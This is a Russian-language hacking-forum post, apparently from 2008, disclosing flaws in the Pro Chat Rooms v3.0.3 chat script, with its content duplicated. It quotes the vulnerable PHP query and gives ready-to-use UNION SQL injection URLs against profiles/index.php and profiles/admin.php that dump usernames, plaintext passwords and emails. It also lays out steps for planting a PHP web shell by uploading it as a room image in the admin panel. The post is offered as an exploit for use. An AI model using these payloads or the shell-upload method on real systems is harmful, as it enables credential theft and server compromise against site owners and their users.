~!DoK_tOR!~
28.09.2008, 17:23
Офф.сайт: www.prochatrooms.com
Demo: www.prochatrooms.com/demo.php
Стоймость: $55 скачать (http://rapidshare.com/files/147963054/prochatrooms_v303.zip.html)
Префикс таблиц бд: prochatrooms_
Табличка: prochatrooms_users
Клонки: user_name,password,email
Алгоритм шифрования: в открытом виде
Админка: http://localhost/admin/
[SQL Injection]
Сценарий /[installdir]/profiles/index.php
уязвимый код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'");
Отсутствует проверка переменной "gud" что позволяет нам провести SQL-Иньекцию.
Условие: magic_quotes_gpc = Off
Эксплойт:
http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,passwor d,email),3,4,5,6,7,8+from+prochatrooms_users/*
Сценарий /[installdir]/profiles/admin.php
уязвимый код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'");
Баг оналогичен предыдущему.
Условие: magic_quotes_gpc = Off
Эксплойт:
http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,passwor d,email),3,4,5,6,7,8+from+prochatrooms_users/*
[Шелл]
Заходим в админку -> создаём новую комнату (http://localhost/[installdir]/admin/index.php?action=rooms) -> Create New Room
Room name: пишем название комнаты
Password: пароль на комнату
Description: описание
Image*: заливаем наш шелл с расширением .php
Шелл будет тут:
http://localhost/[installdir]/backgrounds/shell.php
http://milw0rm.com/exploits/6612
(c) ~!DoK_tOR!~
Demo: www.prochatrooms.com/demo.php
Стоймость: $55 скачать (http://rapidshare.com/files/147963054/prochatrooms_v303.zip.html)
Префикс таблиц бд: prochatrooms_
Табличка: prochatrooms_users
Клонки: user_name,password,email
Алгоритм шифрования: в открытом виде
Админка: http://localhost/admin/
[SQL Injection]
Сценарий /[installdir]/profiles/index.php
уязвимый код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'");
Отсутствует проверка переменной "gud" что позволяет нам провести SQL-Иньекцию.
Условие: magic_quotes_gpc = Off
Эксплойт:
http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,passwor d,email),3,4,5,6,7,8+from+prochatrooms_users/*
Сценарий /[installdir]/profiles/admin.php
уязвимый код:
$tmp=mysql_query("SELECT * FROM prochatrooms_profiles WHERE user_name ='".$_GET['gud']."'");
Баг оналогичен предыдущему.
Условие: magic_quotes_gpc = Off
Эксплойт:
http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,passwor d,email),3,4,5,6,7,8+from+prochatrooms_users/*
[Шелл]
Заходим в админку -> создаём новую комнату (http://localhost/[installdir]/admin/index.php?action=rooms) -> Create New Room
Room name: пишем название комнаты
Password: пароль на комнату
Description: описание
Image*: заливаем наш шелл с расширением .php
Шелл будет тут:
http://localhost/[installdir]/backgrounds/shell.php
http://milw0rm.com/exploits/6612
(c) ~!DoK_tOR!~